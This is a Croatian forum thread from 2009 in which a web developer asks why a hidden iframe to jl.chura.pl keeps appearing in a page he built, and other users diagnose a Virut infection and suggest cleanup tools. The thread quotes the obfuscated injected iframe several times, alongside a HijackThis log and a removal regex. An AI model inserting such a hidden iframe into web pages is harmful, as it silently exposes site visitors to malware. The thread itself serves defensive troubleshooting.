Nova poruka

Virus ili Ne ?

poruka: 28
|
čitano: 5.426
|
moderatori: pirat, Lazarus Long, XXX-Man, vincimus
1
+/- sve poruke
ravni prikaz
starije poruke gore
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 17:54
Odgovori Citiraj
Virus ili Ne ?

Zavrsio sam jedan web site u Dreamweaveru. Jedna od tih stranica kad sam provjeravao u Operi aktivirala je antivirus koji je napisao: Address has been bloked, URL address: "jl.chura.pl/rc/" . Nisam obracao paznju jer sam bio uvjeren da nisam nista koristio sto bi izazvalo antivirus. Sve sam prenio na server i sad nakon mjesec dana vlasnik stranice zove i pita zasto su virusi prisutni. Skinem tu stranicu na svoj PC i provjerim antivirusom i nema nista. Nazovem provajdera , oni kazu da pogledam code pri dnu stranice koji izgleda ovako: <iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>.  Da   stvar bude zanimljivija, nedavno, istu poruku sam dobio   kad sam radio u Corelu.

------------------------------------------------------------------------------------------------------------------------------------------------------------------

Cijelu stranicu sam pisao u Dreamweaveru i taj dio koda nisam upisao. Odakle se pojavio?

Postoji li neko objasnjenje za ovo.

 
trajni link
0 0
Lazarus Long 
17 godina
neaktivan
moderator
offline
pet 29.5.2009 18:02
Odgovori Citiraj
RE: Virus ili Ne ?

Koji virus kaze da je? Koji antivirus imas. Da li je ovde uvucen i java script kod korisnika?

All your carefully picked arguments can easiliy be ignored! There are no real rules about posting. There are no real rules about moderating either - enjoy your ban
 
trajni link nadporuka
0 0
nedIm 
17 godina
neaktivan
offline
pet 29.5.2009 18:04
Odgovori Citiraj
Virus ili Ne ?

LINK!

Arch user :)
Moj PC  
trajni link
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 18:15
Odgovori Citiraj
Virus ili Ne ?

Koristim NOD32. Ali provjeravao sam na vise kompjutera u gradu na razlicitim antivirusima i svi ih pronadju. I provajder je provjerio i nasao taj dio sa Iframe. Sad sam ga rucno obrisao i sve je u redu.

Mene zanima odakle taj dio koda na stranici   a ja ga nisam upisao. Pojavio se u 4 reda isti kod. I sto je najvaznije, kad taj file testiram sa antivirusom ne pronalazi ga kao virus. Kad se ucita preko browsera ona se pojavi.

 
trajni link
0 0
0v3r10rd 
17 godina
neaktivan
offline
pet 29.5.2009 18:34
Odgovori Citiraj
Virus ili Ne ?

Zaražen si virusom...

 

Naparavi analizu računala na kojem radiš s hijackthis alatom i postaj ovdje log.

 

To što ti se u html datoteke upisuje iframe znak je zaraze virusom. Koristiš crackirani NOD32?! Domena jl.chura.pl asocirana je sa Virut virusom, koji je vrlo nezgodan virus.

 

Info o jednoj od varijanta:

http://www.sophos.com/security/analyses/viruses-and-spyware/w32scribblea.html

 

 

I find your lack of faith disturbing!
Moj PC  
trajni link
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 18:42
Odgovori Citiraj
Virus ili Ne ?

Taj mi se slucaj desavao i sa AntiVir i AVG free kad sam koristio. Pretpostavljam da nije do antivirusa. Zasto mi nije i ostale datoteke zarazio?

Opet napominjem: kad testiram sa antivirusom ne pronalazi nista. Pokazuje da je sve cisto. Ali ga pronadje kad odem na tu stranicu na webu i nista se ne desava osim sto se pojavi poruka antivirusa.

 
trajni link
0 0
Fowix 
16 godina
neaktivan
offline
pet 29.5.2009 18:48
Odgovori Citiraj
RE: Virus ili Ne ?
index-v kaže...

Taj mi se slucaj desavao i sa AntiVir i AVG free kad sam koristio. Pretpostavljam da nije do antivirusa. Zasto mi nije i ostale datoteke zarazio?

Opet napominjem: kad testiram sa antivirusom ne pronalazi nista. Pokazuje da je sve cisto. Ali ga pronadje kad odem na tu stranicu na webu i nista se ne desava osim sto se pojavi poruka antivirusa.

 To onda znaci da nemas virus na kompu nego je virus na webu! A to neznam kako ces rijesit...
 
trajni link nadporuka
0 0
rambox 
17 godina
offline
pet 29.5.2009 19:04
Odgovori Citiraj
RE: Virus ili Ne ?
index-v kaže...

Zavrsio sam jedan web site u Dreamweaveru. Jedna od tih stranica kad sam provjeravao u Operi aktivirala je antivirus koji je napisao: Address has been bloked, URL address: "jl.chura.pl/rc/" . Nisam obracao paznju jer sam bio uvjeren da nisam nista koristio sto bi izazvalo antivirus. Sve sam prenio na server i sad nakon mjesec dana vlasnik stranice zove i pita zasto su virusi prisutni. Skinem tu stranicu na svoj PC i provjerim antivirusom i nema nista. Nazovem provajdera , oni kazu da pogledam code pri dnu stranice koji izgleda ovako: <iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>.  Da   stvar bude zanimljivija, nedavno, istu poruku sam dobio   kad sam radio u Corelu.

------------------------------------------------------------------------------------------------------------------------------------------------------------------

Cijelu stranicu sam pisao u Dreamweaveru i taj dio koda nisam upisao. Odakle se pojavio?

Postoji li neko objasnjenje za ovo.

 Ta stranica je sumnjiva tj s nje su izvrseni svakakvi napadi na korisnike kak i uopzorava Firefox ili WOT ista stvar pa je onda sve jasno!Cool

http://www.mywot.com/en/scorecard/jl.chura.pl

Moj PC  
trajni link nadporuka
0 0
0v3r10rd 
17 godina
neaktivan
offline
pet 29.5.2009 19:07
Odgovori Citiraj
RE: Virus ili Ne ?
index-v kaže...

Zavrsio sam jedan web site u Dreamweaveru. Jedna od tih stranica kad sam provjeravao u Operi aktivirala je antivirus koji je napisao: Address has been bloked, URL address: "jl.chura.pl/rc/" . Nisam obracao paznju jer sam bio uvjeren da nisam nista koristio sto bi izazvalo antivirus. Sve sam prenio na server i sad nakon mjesec dana vlasnik stranice zove i pita zasto su virusi prisutni. Skinem tu stranicu na svoj PC i provjerim antivirusom i nema nista. Nazovem provajdera , oni kazu da pogledam code pri dnu stranice koji izgleda ovako: <iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>.  Da   stvar bude zanimljivija, nedavno, istu poruku sam dobio   kad sam radio u Corelu.

------------------------------------------------------------------------------------------------------------------------------------------------------------------

Cijelu stranicu sam pisao u Dreamweaveru i taj dio koda nisam upisao. Odakle se pojavio?

Postoji li neko objasnjenje za ovo.

 Iframe je ubačen u html/php/asp prilikom izrade web stranica LOKALNO na računalu, daklem nije zaražen neki web server već ima lokalno zarazu.
Skini Hijackthis ( http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download ) i odskeniraj računalo, te postaj log ovdje, analizom se može utvrditi postojanje neke zaraze...
AV softvare može biti i nefunkcionalan zbog zaraze...
I find your lack of faith disturbing!
Moj PC  
trajni link nadporuka
1 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 19:15
Odgovori Citiraj
Virus ili Ne ?

Dakle ovako. Pisem rucno kod u Dreamweaveru. Svakih par minuta provjerim kroz Operu kako ce izgledati stranica. Napravim 10 kopija iste stranice: dakle menu, header, footer su uvijek isti ali se textovi mijenjaju po stranicama. I dok pisem kod i provjeravam kako ce izgledati- SAMO TA JEDNA STRANICA AKTIVIRA ANTIVIRUS i u njoj se pojavljuje ta IFRAME linija koda a ja to ne upisujem. Provjerim taj file sa NOD32 i nema nista. Opet provjerim izgled stranice kroz Operu i opet se aktivira antivirus.

 
trajni link
0 0
Bellatrix 
16 godina
neaktivan
offline
pet 29.5.2009 19:21
Odgovori Citiraj
Virus ili Ne ?

Pa čovječe, moguće je da ti je računalo zaraženo virusom koji modificira sve html i druge fileove koje spremiš na disk. Dakle možda automatski ubaci neki kod u njega. Skini superantispyware ili malwarebytes te odskeniraj računalo. Kad budeš 100% siguran da si "čist" a problem bude tu i dalje e tek onda treba negdje drugdje tražiti krivca...

Poruka je uređivana zadnji put pet 29.5.2009 19:36 (Bellatrix).
Moj PC  
trajni link
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 19:21
Odgovori Citiraj
Virus ili Ne ?

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:17:37 PM, on 5/29/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
D:\Intel\Wireless\Bin\EvtEng.exe
D:\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
D:\UltraMon\UltraMon.exe
D:\True Image 2009\TrueImageMonitor.exe
D:\True Image 2009\TimounterMonitor.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe
C:\WINDOWS\system32\RunDll32.exe
D:\UltraMon\UltraMonTaskbar.exe
C:\Program Files\Acronis\PrivacyExpert\Shield.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
D:\RFA\rfagent.exe
D:\ADOBE\Acrobat\Acrotray.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
D:\Intel\Wireless\Bin\RegSrvc.exe
C:\Program Files\Common Files\Acronis\ProcessActivityMonitor\paamsrv.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
C:\WINDOWS\System32\svchost.exe
J:\P-R-O-G-R-A-M-S\Hijackthis\HiJackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = C:\WINDOWS\PCHealth\HelpCtr\System\panels\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\WINDOWS\PCHealth\HelpCtr\System\panels\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: SnagIt Toolbar Loader - {00C6482D-C502-44C8-8409-FCE54AD9C208} - D:\TechSmith\SnagIt 8\SnagItBHO.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~2\Office12\GRA8E1~1.DLL
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - D:\ADOBE\Acrobat\AcroIEFavClient.dll
O2 - BHO: Acronis Popup Blocker - {E24AD748-155E-4254-B674-4EDF86E7E1DF} - C:\PROGRA~1\Acronis\PRIVAC~1\Blocker.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: SnagIt - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - D:\TechSmith\SnagIt 8\SnagItIEAddin.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - D:\ADOBE\Acrobat\AcroIEFavClient.dll
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [ATIPTA] "C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe"
O4 - HKLM\..\Run: [UltraMon] "D:\UltraMon\UltraMon.exe" /auto
O4 - HKLM\..\Run: [TrueImageMonitor.exe] D:\True Image 2009\TrueImageMonitor.exe
O4 - HKLM\..\Run: [AcronisTimounterMonitor] D:\True Image 2009\TimounterMonitor.exe
O4 - HKLM\..\Run: [Acronis Scheduler2 Service] "C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe"
O4 - HKLM\..\Run: [Acronis Popup Blocker] RunDll32.exe C:\PROGRA~1\Acronis\PRIVAC~1\Blocker.dll,Run
O4 - HKLM\..\Run: [SpyWare Shield] "C:\Program Files\Acronis\PrivacyExpert\Shield.exe"
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [rfagent] "D:\RFA\rfagent.exe"
O4 - HKLM\..\Run: [Acrobat Assistant 8.0] "D:\ADOBE\Acrobat\Acrotray.exe"
O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: Append to existing PDF - res://D:\ADOBE\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://D:\ADOBE\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://D:\ADOBE\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://D:\ADOBE\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://D:\ADOBE\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://D:\ADOBE\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://D:\ADOBE\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://D:\ADOBE\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Acronis Pop-up Blocker - {2E071ADC-ADF8-4b4b-8ACB-EDC49E6D45A2} - C:\PROGRA~1\Acronis\PRIVAC~1\Blocker.dll
O9 - Extra 'Tools' menuitem: Acronis Pop-up Blocker - {2E071ADC-ADF8-4b4b-8ACB-EDC49E6D45A2} - C:\PROGRA~1\Acronis\PRIVAC~1\Blocker.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~2\Office12\GR99D3~1.DLL
O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: EvtEng - Intel Corporation - D:\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: NBService - Nero AG - D:\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: Process Activity Monitor (paamsrv) - Unknown owner - C:\Program Files\Common Files\Acronis\ProcessActivityMonitor\paamsrv.exe
O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: RegSrvc - Intel Corporation - D:\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Spectrum24 Event Monitor (S24EventMonitor) - Intel Corporation - D:\Intel\Wireless\Bin\S24EvMon.exe
O24 - Desktop Component 0: (no name) - file:///C:/DOCUME~1/vinko/LOCALS~1/Temp/msohtmlclip1/01/clip_image002.jpg

--
End of file - 9108 bytes

 
trajni link
0 0
0v3r10rd 
17 godina
neaktivan
offline
pet 29.5.2009 19:23
Odgovori Citiraj
RE: Virus ili Ne ?
index-v kaže...

Dakle ovako. Pisem rucno kod u Dreamweaveru. Svakih par minuta provjerim kroz Operu kako ce izgledati stranica. Napravim 10 kopija iste stranice: dakle menu, header, footer su uvijek isti ali se textovi mijenjaju po stranicama. I dok pisem kod i provjeravam kako ce izgledati- SAMO TA JEDNA STRANICA AKTIVIRA ANTIVIRUS i u njoj se pojavljuje ta IFRAME linija koda a ja to ne upisujem. Provjerim taj file sa NOD32 i nema nista. Opet provjerim izgled stranice kroz Operu i opet se aktivira antivirus.

 Što misliš da ti upisuje taj kod u stranicu?! Ne upisuje se nekom čarolijom...
Imaš virus na računalu, daj napravi log s hijackthis i postaj ako želiš pomoć....
Možeš pokušati i odskenirati računalo s Malwarebytes i skinuti  alat za dezinfekciju od viruta (ako je stvarno taj virus u pitanju). Log od hijackthis pomaže u analizi.
I find your lack of faith disturbing!
Moj PC  
trajni link nadporuka
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 19:28
Odgovori Citiraj
Virus ili Ne ?

Eto log fle iznad.

 
trajni link
0 0
0v3r10rd 
17 godina
neaktivan
offline
pet 29.5.2009 19:32
Odgovori Citiraj
Virus ili Ne ?

U logu nije vidljivo ništa potencijalno opasno. Hm...

 

Skini Malwarebytes, instaliraj, napravi update i provjeri računalo...

 

http://www.malwarebytes.org/

 

EDIT: Moguće je da je virus zarazio neki od legitimnih programa, što nije vidljivo u Hijackthis logu.

I find your lack of faith disturbing!
Poruka je uređivana zadnji put pet 29.5.2009 19:37 (0v3r10rd).
Moj PC  
trajni link
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 19:52
Odgovori Citiraj
Virus ili Ne ?

Malwarebytes nije nista nasao.

-------------------------------------------------------------

Sve je to u redu sto vi pisete. Ali kad taj file skeniram antivirusom, pokazuje da je file u redu (nema virusa) - ali kad ga pokrenem kroz Operu ili Explorer onda se aktivira antivirus i pise da je zarazen.

 
trajni link
0 0
makaweli 
17 godina
neaktivan
offline
pet 29.5.2009 19:58
Odgovori Citiraj
Virus ili Ne ?

O4 - HKLM\..\Run: [UltraMon] "D:\UltraMon\UltraMon.exe" /auto -- ovo mi je sumnjivo. Ako sam u krivu ispravite me :S

Music is my life :)
Moj PC  
trajni link
0 0
Fowix 
16 godina
neaktivan
offline
pet 29.5.2009 20:00
Odgovori Citiraj
Virus ili Ne ?

Ova stranica mi je vec otprije poznata, i sad sam siguran da nije samo meni! Pogledajte ovo, i obratite pozornost na prvi rezultat.

Jeli ti to nas mozda zezas da ti radis tu stranicu a?? A ako jesi onda hostas malware vec dugo vremena prijatelju...

Poruka je uređivana zadnji put pet 29.5.2009 20:01 (Fowix).
 
trajni link
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 20:00
Odgovori Citiraj
Virus ili Ne ?

To je mali program koji dijeli sliku na 2 monitora. Vec bi ga neki od ovih silnih sigurnosnih alata pronasao.

 
trajni link
0 0
0v3r10rd 
17 godina
neaktivan
offline
pet 29.5.2009 20:04
Odgovori Citiraj
Virus ili Ne ?

Što ti kaže AV soft?

 

Koji virus je u pitanju?

I find your lack of faith disturbing!
Moj PC  
trajni link
0 0
Somebody 
16 godina
neaktivan
offline
pet 29.5.2009 20:05
Odgovori Citiraj
RE: Virus ili Ne ?
index-v kaže...

Malwarebytes nije nista nasao.

-------------------------------------------------------------

Sve je to u redu sto vi pisete. Ali kad taj file skeniram antivirusom, pokazuje da je file u redu (nema virusa) - ali kad ga pokrenem kroz Operu ili Explorer onda se aktivira antivirus i pise da je zarazen.

 a da probas uninstalirat Operu s REVO-m, obriši registry i ponovo ju instaliraj, mozda pomogne jer ti može bit virus na pregledniku!
90% forumaša ovdje ima u potpisu neku foru sa 90% ovoga i 10% onoga,a ako si među 10% onih koji to nemaju stavi ovo u potpis. Bolje ispasti budala nego iz aviona.Ajde zuri u sunce ili tako nešto
Moj PC  
trajni link nadporuka
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 20:08
Odgovori Citiraj
Virus ili Ne ?

Fowix - ako nemas pametan odgovor nemoj pisati gluposti. Prije svega pitam ljude koji su eventualno ovo imali i mozda imaju odgovor.

 
trajni link
0 0
Fowix 
16 godina
neaktivan
offline
pet 29.5.2009 20:09
Odgovori Citiraj
Virus ili Ne ?

Evo sta sam nakon kratkog istrazivanja pronasao, posebno obratite pozornost na oznacene djelove!!

 

I found this same code in almost all HTML files one of my computers too. I found this thread while googling for "jL.chura.pl".

Here is the full story: One of my computers has been infected with a very malicious virus a few days ago. The virus was identified by F-prot as "W32/Virut.AI!Generic" and Avast identified it as "Win32:Vitro". They're probably the same virus because it was detected by both programs in exactly the same files. It infects exe files and installs a rootkit that makes it very hard to detect ... then it opens a "gate to hell" on the infected machine as it downloads all sorts of trojans and malware ...

I'm not a novice user ... I'm a software developer and I'm usually cautious ... this is the first virus to infect my computer since 6 or 7 years ago and I can assure that it's really really nasty ... I had to get rid of the entire system and reinstall Windows from scratch to get rid of that virus.

I think one of the activities that this virus does is inject the iframe code mentioned in the above posts into all html files it finds ... Among the infected files are the signature files for Outlook, which means the injected code would reach any one I send an email to. I believe Avast ought to remove this code from HTML files during scanning but unfortunately it doesn't do this currently, and the code goes undetected.

To get rid of this issue: First of all, you have a bigger problem, which is the Win32:Vitro ... you should get rid of that first. Next, I used a free program called grepWin (from http://tools.tortoisesvn.net) ... it's a very fast file search utility ... use its regular expression search to search for:

Code:
<iframe src="http://jL\.c&#104;ura.*</iframe>

in all "*.htm*" files and replace it with an empty string or with something like

Code:



I hope this helps someone ...

Poruka je uređivana zadnji put pet 29.5.2009 20:19 (Fowix).
 
trajni link
0 0
Fowix 
16 godina
neaktivan
offline
pet 29.5.2009 20:11
Odgovori Citiraj
RE: Virus ili Ne ?
index-v kaže...

Fowix - ako nemas pametan odgovor nemoj pisati gluposti. Prije svega pitam ljude koji su eventualno ovo imali i mozda imaju odgovor.

 Evo ti najbolji odgovor u mome prijasnjem postu,obrati pozornost na boldane djelove!
Poruka je uređivana zadnji put pet 29.5.2009 20:11 (Fowix).
 
trajni link nadporuka
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 20:11
Odgovori Citiraj
Virus ili Ne ?

0v3r10rd

NOD 32 samo napise da ce ta adresa biti blokirana i nista vise. Nista se ne desi na, nema nikakve promjene na stranici. Ali vlasnik stranice ima AVG i kaze da kod njega pise da je Trojan.

 
trajni link
0 0
Littlemanbeingerased 
17 godina
neaktivan
offline
pet 29.5.2009 20:15
Odgovori Citiraj
RE: Virus ili Ne ?

imas vajrus na kompu.. ako tvoj nista ne nadje.. probaj:

http://www.sophos.com/support/knowledgebase/article/13251.html

 

dload, puknes na USB stick, bootas safe mode i pokrenes scan sa sticka..

ili probaj bilo koji drugi nacin.. ali preferably u safe mode.

imas vajrus koji ti maltretira html stranice.. tj. dodaje one redove koji ukazuju na zlocestu stranicu.

 

Reg: But apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, the fresh-water system, and public health, what have the Romans ever done for us? Xerxes: Brought
Moj PC  
trajni link nadporuka
0 0
0v3r10rd 
17 godina
neaktivan
offline
pet 29.5.2009 20:20
Odgovori Citiraj
Virus ili Ne ?

Gle to vjerojatno je Virut (jedna od njegovih varijanti)

 

Pokušaj s ovim: http://www.symantec.com/business/security_response/removaltools.jsp

Klikni na link za Win32.Virut removal tool, prouči upute (uglavnom moraš provjerit računalo u Safe modu) i proskeniraj...

 

Nadam se da će pomoći.

I find your lack of faith disturbing!
Moj PC  
trajni link
0 0
index-v 
16 godina
neaktivan
offline
pet 29.5.2009 20:26
Odgovori Citiraj
Virus ili Ne ?

I dalje radim web stranice i vise se ne desava. Opet kazem SAMO NA TOJ JEDNOJ JEDINOJ STRANICI SE TO DESILO.

------------------------------------------------------------------------------------------------------------------------------------------------

Nazvao sam Providera i on mi je rekao da su to nevidljivi frameovi i da ce biti stranica napadnuta i da ce se kod na stranici promijeniti. Ja sam tu liniju koda obrisao i sad je sve u redu.

------------------------------------------------------------------------------------------------------------------------------------------------

 

 
trajni link
0 0
1
Nova poruka
Pronađi
Prijava korisnika
E-mail:
Lozinka:
 
Aktivne teme
vrh stranice
Copyright © 2008 - 2025 Bug d.o.o. sva prava pridržana.